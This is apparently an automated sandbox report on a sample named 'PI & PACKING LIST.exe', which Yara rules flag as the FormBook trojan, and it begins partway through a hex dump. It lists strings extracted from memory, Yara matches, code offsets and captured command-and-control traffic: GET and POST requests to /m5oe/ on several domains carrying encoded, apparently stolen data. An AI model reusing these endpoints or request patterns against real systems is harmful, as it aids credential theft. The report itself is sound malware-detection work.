20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6
      Source: control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://35.78.89.117
      Source: control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://amh.sh
      Source: control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://amh.sh/
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000003.00000000.292294807.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.323770993.000000000F270000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: PI & PACKING LIST.exe, 00000000.00000002.261208049.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: PI & PACKING LIST.exe, 00000000.00000002.261208049.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: 71M40-2OQ.13.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: 71M40-2OQ.13.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: 71M40-2OQ.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: 71M40-2OQ.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
      Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
      Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
      Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
      Source: control.exe, 0000000D.00000002.517422506.0000000005BFE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY
      Source: control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: unknownHTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.cpitherapy.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.cpitherapy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cpitherapy.com/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 48 66 46 55 75 59 66 47 6f 41 36 38 37 5f 73 34 4d 6c 67 48 78 4f 42 34 6c 5a 30 4e 6d 37 6a 72 4b 34 71 4a 48 45 36 63 78 34 47 33 69 4b 64 52 45 70 44 54 28 78 50 6f 66 61 6c 57 61 75 43 6f 4f 58 48 42 65 69 37 48 45 36 30 67 44 4e 41 6d 31 4e 78 32 58 61 34 63 63 64 77 33 43 64 48 61 77 6f 54 35 43 47 7a 5a 51 78 56 49 38 46 71 5f 34 76 6c 57 6d 62 35 36 6d 71 48 6c 74 70 66 6d 69 58 72 36 56 31 70 6b 4d 41 48 77 4f 70 6f 51 6f 61 63 61 72 33 77 6a 4a 64 4a 56 41 33 32 5a 47 32 67 6b 6f 6f 34 49 4c 69 28 49 37 32 43 45 5a 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: l48xI=HfFUuYfGoA687_s4MlgHxOB4lZ0Nm7jrK4qJHE6cx4G3iKdREpDT(xPofalWauCoOXHBei7HE60gDNAm1Nx2Xa4ccdw3CdHawoT5CGzZQxVI8Fq_4vlWmb56mqHltpfmiXr6V1pkMAHwOpoQoacar3wjJdJVA32ZG2gkoo4ILi(I72CEZw).
      Source: unknownDNS traffic detected: queries for: www.gebouwpas.online
      Source: global trafficHTTP traffic detected: GET /m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.zkjk888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.cpitherapy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.p-soils.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.bengalindex.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48 HTTP/1.1Host: www.nu2uresale.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000002.353618597.0000000000C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: Process Memory Space: PI & PACKING LIST.exe PID: 2352, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: control.exe PID: 5228, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: PI & PACKING LIST.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.353618597.0000000000C60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: Process Memory Space: PI & PACKING LIST.exe PID: 2352, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: control.exe PID: 5228, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_00B2ADBC
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_00B2D478
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_00B2D46A
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_04A39F68
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_083E0037
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_083E0033
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_083E0040
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 0_2_083E9248
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01254120
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123F900
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012599BF
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0130E824
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A830
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1002
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012620A0
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_013020A8
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124B090
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_013028EC
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01302B28
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125A309
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012DCB4F
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125AB40
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126EBB0
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126138B
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012E23E3
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F03DA
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FDBD2
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126ABD8
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012EFA2B
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B236
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_013022AE
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4AEF
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01230D20
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01302D07
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01301D55
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01262581
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F2D82
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124D5E0
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_013025DD
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124841F
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FD466
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01301FF1
